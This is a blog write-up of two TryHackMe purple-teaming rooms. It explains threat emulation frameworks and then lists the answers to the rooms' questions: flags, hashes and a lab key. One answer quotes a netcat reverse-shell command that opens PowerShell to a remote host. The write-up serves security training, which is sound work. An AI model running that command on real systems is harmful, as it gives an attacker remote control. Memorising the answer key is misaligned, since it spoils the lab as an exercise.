We covered practical purple teaming by conducting threat emulation using Atomic red team and examining the impact of said emulation by investigating and analyzing logs. We used TryHackMe Atomic Bird Goes Purple #1 room which is part of SOC Level 2 track.
We also covered the answers for TryHackMe Atomic Bird Goes Purple #2 room
Windows Active Directory Penetration Testing Study Notes
Purple Teaming & Threat Emulation
The importance of Threat Emulation is invaluable when it comes to enhancing an organisation’s cyber security posture or security team’s capability. Threat Emulation is the process of simulating and replicating the tactics, techniques and procedures (TTPs) of selected threats (according to the organisation/team’s needs and current status) in a controlled environment. This includes recreating attack scenarios as detailed as possible to focus on each step of the attack chain for improving detection abilities, revealing gaps and weaknesses, and testing the effectiveness of the implemented security controls.
This process can be done through various methods, including red teaming activities, penetration testing, and the use of tools. This room uses the Atomic Red Team project to simulate attacks.
A well-configured endpoint will generate sufficient log files for threat emulation tests. Additional detection tools also increase visibility, and various options exist. This room uses Aurora EDR and Sysmon to increase the visibility of each test and enrich the logs. The purpose of the exercises is to view the results of the tests as they are and to observe the activity details and artefacts, which are crucial for detection.
You are expected to execute given custom tests and then investigate logs and system activities for each test. The most important outcome of the exercise is executing a test and following up on the actions right after it. This includes log, directory and registry investigation. You must consider everything from both Red and Blue perspectives to go Purple!
Threat Emulation Methodologies
MITRE ATT&CK
The MITRE ATT&CK Framework is an industry-known knowledge base that provides information about known adversarial TTPs observed in actual attacks and breaches. Threat emulation teams can extract many benefits from integrating ATT&CK with their engagements as it would make it efficient when writing reports and mitigations related to the behaviors experimented with.
Atomic Red Team
Atomic Red Team is an open-source project that provides a framework for performing security testing and threat emulation. It consists of tools and techniques that can be used to simulate various types of attacks and security threats, such as malware, phishing attacks, and network compromise. The Atomic Red Team aims to help security professionals assess the effectiveness of their organization’s security controls and incident response processes and identify areas for improvement.
TIBER-EU Framework
The Threat Intelligence-based Ethical Red Teaming (TIBER-EU) is the European framework developed to deliver controlled, bespoke, intelligence-led emulation testing on entities and organizations’ critical live production systems. It is meant to provide a guideline for stakeholders to test and improve cyber resilience through controlled adversary actions.
CTID Adversary Emulation Library
The Center for Threat-Informed Defense is a non-profit research and development organization operated by MITRE Engenuity. Its mission is to promote the practice of threat-informed defence. With this mission, they have curated an open-source adversary emulation plan library, allowing organisations to use the plans to evaluate their capabilities against real-world threats.
CALDERA
Definition
CALDERA™ is an open-source framework designed to run autonomous adversary emulation exercises efficiently. It enables users to emulate real-world attack scenarios and assess the effectiveness of their security defences.
Additionally,blue teamers can also use CALDERA to perform automated incident response actions through deployed agents. This functionality aids in identifying TTPs that other security tools may not detect or prevent.
Check out the video below for detailed explanation.
Room Answers | TryHackMe Atomic Bird Goes Purple #1
Use the required PowerShell command to retrieve the flag.
What is the flag?
THM{Emulation_is_fun_but_needs_focus_and_exploration}
What is the required command to clear all generated artefacts and restore the affected files from test T0123-4?
Invoke-AtomicTest T0123-4 -Cleanup
Execute test T0004-1 and open the document created on the Desktop.
What is the OS Build info?
10.0.17763 N/A Build 17763
Execute test T0004-2.
What is the flag?
THM{THM_Emulation_Room}
Execute test T0004-3.
Examine the logs; what is the failed command?
/bin/bash
Navigate the disk and drives, and open the shared folder.
What is the SHA256 value of the “.txt” document?
3CA9FB42ACF0A347BDFDC78E0435331BC458194E4BC7FBFFB255BC4CF02CDC1A
Execute the test T0005-1.
Re-calculate the SHA256 value of the document. What is the hash value?
626DBB861DCFF600DABEFCE7BF93F2C72C0F6462CC5729B963FC8242D7D43990
Execute test T0006-1.
Find the malicious history dump file. What is the flag?
THM{THM_analytics_to_exfiltration_with_NexGenHunt}
Execute test T0006-2.
Find the malicious system file modification activity. What is the flag?
THM{NextGenHunt.thm.jhn}
Room Answers | TryHackMe Atomic Bird Goes Purple #2
Execute test T0002-1 and open the document created on the Desktop.
Which PowerShell library file is detected?
YamlDotNet.xml
Now go to the atomics path and update the executed script to include all “bak” files.
What is the code snippet that needs to be added to the code?
,*.bak
Run the cleanup command for the test T0002-1 and re-execute the test.
Open the output file, and investigate the detected files.
What is the secret key?
L1LAFLHQ5peGsjh7Pee8wHFY1SBQHe85A1HZhVrK47Yf6cqmH3n8
Execute test T0002-2 and investigate logs.
What is the new account name?
Adminstrator
Execute test T0003-1.
What is the name of the created service?
thm-registered-service
Which image is used to set the registry value for the created service?
C:\Windows\system32\services.exe
Execute test T0003-2.
What is the ransom note?
THM{THM_Offline_Index_Emulation}
Execute test T0003-3.
What is the updated file extension?
.thm-jhn
Execute test T0003-4.
What is the assigned value of the malicious registry value?
nc 10.10.thm.jhn 4499 -e powershell
Video Walkthrough | TryHackMe Atomic Bird Goes Purple
